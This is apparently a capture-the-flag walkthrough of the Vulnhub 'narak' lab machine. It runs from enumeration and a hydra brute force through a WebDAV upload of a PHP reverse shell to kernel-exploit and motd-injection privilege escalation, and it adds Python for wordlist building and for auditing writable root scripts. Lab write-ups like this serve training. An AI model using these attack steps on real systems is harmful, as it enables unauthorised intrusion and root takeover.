Vulnhub narak
2022-07-03 11:47:00 【Plum_ Flowers_ seven】
One、 Full port scan
Two、 Service version detection
Three、 Information gathering
The page source shows no endpoints in comments, no leaked source and no hidden directories, and there is no robots.txt or readme.txt either.
No file inclusion, SQL injection, XSS or other common vulnerabilities were found.
The other pages linked from the site contain nothing that helps us either.
Four、 dirsearch directory brute force
1. Default dictionary: one hit comes back with status code 401
401 means the directory exists but requires authentication.
403 means the directory or file exists but the server configuration refuses the request.
404 means not found.
2. dirb common dictionary
dirsearch -u http://192.168.29.135 -f -e html,txt,php -w /usr/share/wordlists/dirb/common.txt
This also turns up a tips.txt, but its content is of no use.
Five、 webdav
What WebDAV is:
An extension of HTTP/1.1, similar in purpose to FTP: it lets clients upload and download files on the server. This is our way in. Common weak pairs such as admin/admin, guest/guest and root/root all fail. Brute force is the only option left, but without even a username a blind attack is too expensive, so we build a custom dictionary from the site itself.
Six、 cewl custom dictionary
How it works: cewl crawls the given URL, collects the resources it finds, extracts and combines the words in them, and writes out a dictionary.
cewl http://192.168.29.135/ > dict.txt
or
cewl http://192.168.29.135/ -w dict.txt
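To make the "crawl, extract, combine" description concrete, here is the core of what cewl does written in Python. This is an added example, not cewl's own code: it drops tags, ignores script and style bodies, splits the visible text into words, keeps those of at least min_len characters (3 is cewl's default minimum) and dedupes them in first-seen order. The HTML it runs on is constructed for the demonstration; real cewl additionally follows links to a configurable depth, which this single-page version does not.

```python
import re
from html.parser import HTMLParser

# Added example (not cewl's code): single-page word extraction the way a
# wordlist crawler does it. SAMPLE_HTML is constructed for the demo.


class _TextCollector(HTMLParser):
    """Collects visible text, skipping <script> and <style> bodies, which hold
    code rather than words a user might have chosen as a password."""

    def __init__(self):
        super().__init__()
        self._skip = 0
        self.chunks = []

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip:
            self.chunks.append(data)


def extract_words(html, min_len=3):
    """Return the distinct words of the page (letters, then letters/digits),
    case preserved, in order of first appearance, dropping short ones."""
    parser = _TextCollector()
    parser.feed(html)
    parser.close()
    text = " ".join(parser.chunks)
    seen, words = set(), []
    for word in re.findall(r"[A-Za-z][A-Za-z0-9]*", text):
        if len(word) >= min_len and word not in seen:
            seen.add(word)
            words.append(word)
    return words


# Constructed page with a title, body text, a stylesheet, a script and links.
SAMPLE_HTML = """<html><head><title>Narak</title><style>.x{color:red}</style></head>
<body><h1>Welcome to Narak</h1>
<p>Yamdoot guards the gate; Swarg lies beyond.</p>
<script>var hidden = "notaword";</script>
<a href="/tips.txt">Tips</a> <b>to</b> go</body></html>
"""

if __name__ == "__main__":
    import sys
    from urllib.request import urlopen

    if len(sys.argv) > 1:   # usage: python3 words.py http://192.168.29.135/ > dict.txt
        page = urlopen(sys.argv[1], timeout=10).read().decode("utf-8", "replace")
    else:
        page = SAMPLE_HTML
    print("\n".join(extract_words(page)))
```

Case is kept on purpose: the password found later on this box is capitalised, and a list that was lower-cased on the way out would never contain it.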
Seven、 hydra brute force
Running hydra against /webdav with dict.txt finds a valid login; the credentials are used with davtest below.
Eight、 davtest upload of a reverse shell
1. Test run
davtest -auth yamdoot:Swarg -url http://192.168.29.135/webdav
The output shows at a glance which file types can be uploaded and which of them the server actually executes.
The target has a PHP runtime, so PHP is the one to use.
2. Upload the PHP shell
We use the PHP reverse shell that ships with Kali (under /usr/share/webshells/php/; set its $ip and $port to the listener before uploading).
davtest -auth yamdoot:Swarg -uploadfile php-reverse-shell.php -uploadloc exp.php -url http://192.168.29.135/webdav
3. Listen and trigger
Start a listener on the port set in the shell, then request the uploaded exp.php so the server executes it and the shell connects back.
Nine、 0day privilege escalation
Escalate through CVE-2021-3479.
The target has no gcc, so compile the exploit locally, upload the binary and run it there (build on a matching system, or link it statically, so that it actually runs on the target).
Ten、 Regular privilege escalation
1. Information gathering
Look for files owned by root that are executable by owner and group yet writable by other users: anything we can edit that a privileged process will run. The search turns up a hell.sh whose content is a passage of BF (Brainfuck) code.
find / -user root -type f -perm -ug=x,o=w -exec ls -al {} \; 2>/dev/null
Eleven、 BF language
BF is short for Brainfuck.
Running the program on the site below yields the string chitragupt. Trying it as the password of one of the regular users works: ssh gets us in as the user inferno.
tio.run/#brainfuck
The first flag.txt is found here.
Twelve、 motd injection
1. Information gathering
There is a 00-header file, and it is a shell script.
2. motd
motd stands for message of the day, the login banner. The scripts under update-motd.d are executed as root at every login to build it. Here 00-header is owned by root but we also have write permission on it, so it can be used to escalate.
3. Modify 00-header
Append a shell command at the end of the file.
4. su root
Log in again so the modified script runs, then su root.
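The find command in section Ten and the writable 00-header in section Twelve are one bug class: a file root will execute that a low-privileged user can modify. The following is an added example, not from the write-up: the same audit in Python, so it can be dropped onto a target that lacks GNU find options or run as part of a host check. The paths are the write-up's; owner_uid is a parameter only so the check can be exercised on a scratch directory owned by the current user (for real use it is root, uid 0).

```python
import os
import stat
import tempfile

# Added example (not from the write-up): the privilege-escalation audit from
# sections Ten and Twelve. MOTD_DIR is the standard update-motd.d location;
# self_check() builds a constructed scratch tree to demonstrate both checks.

MOTD_DIR = "/etc/update-motd.d"


def exec_by_owner_group_writable_by_others(st):
    """Equivalent of find's -perm -ug=x,o=w: all three bits must be set."""
    m = st.st_mode
    return bool(m & stat.S_IXUSR) and bool(m & stat.S_IXGRP) and bool(m & stat.S_IWOTH)


def runnable_and_writable_by_non_owner(st):
    """What matters for a login script: run-parts only executes files with an
    execute bit, and group- or world-write lets someone other than the owner
    change what root will run."""
    m = st.st_mode
    executable = bool(m & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH))
    return executable and bool(m & (stat.S_IWGRP | stat.S_IWOTH))


def find_writable_root_files(roots, owner_uid=0, skip=("/proc", "/sys", "/dev", "/run")):
    """Python version of
    find / -user root -type f -perm -ug=x,o=w -exec ls -al {} \\; 2>/dev/null
    Walks each root (skipping pseudo filesystems) and returns the hits sorted."""
    hits = []
    for root in roots:
        for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
            if dirpath.startswith(skip):
                dirnames[:] = []   # do not descend
                continue
            for name in filenames:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)
                except OSError:
                    continue   # the 2>/dev/null part
                if (stat.S_ISREG(st.st_mode) and st.st_uid == owner_uid
                        and exec_by_owner_group_writable_by_others(st)):
                    hits.append(path)
    return sorted(hits)


def writable_motd_scripts(motd_dir=MOTD_DIR, owner_uid=0):
    """Scripts root will run at login (pam_motd -> run-parts) that a non-owner
    can modify: the 00-header case."""
    hits = []
    try:
        names = os.listdir(motd_dir)
    except OSError:
        return hits
    for name in names:
        path = os.path.join(motd_dir, name)
        st = os.lstat(path)
        if (stat.S_ISREG(st.st_mode) and st.st_uid == owner_uid
                and runnable_and_writable_by_non_owner(st)):
            hits.append(path)
    return sorted(hits)


def self_check():
    """Constructed scratch tree owned by the current user; returns the basenames
    each check flags so the behaviour can be verified without root."""
    base = tempfile.mkdtemp()
    modes = {
        "hell.sh": 0o757,       # ug+x and o+w: the find hit
        "00-header": 0o775,     # group-writable script: motd hit, not a find hit
        "10-help-text": 0o755,  # normal motd script: clean
        "notes.txt": 0o666,     # writable but never executed: clean
    }
    for name, mode in modes.items():
        path = os.path.join(base, name)
        with open(path, "w") as f:
            f.write("#!/bin/sh\n")
        os.chmod(path, mode)
    me = os.getuid()
    return (
        [os.path.basename(p) for p in find_writable_root_files([base], owner_uid=me)],
        [os.path.basename(p) for p in writable_motd_scripts(base, owner_uid=me)],
    )


if __name__ == "__main__":
    for p in find_writable_root_files(["/"]):
        print("root-owned, executable, world-writable:", p)
    for p in writable_motd_scripts():
        print("motd script root runs at login, writable by non-owner:", p)
```

The motd check deliberately looks at group-write as well as world-write: the original find would have missed a 00-header that is only group-writable, yet membership in that group is all an attacker needs to get the same root shell.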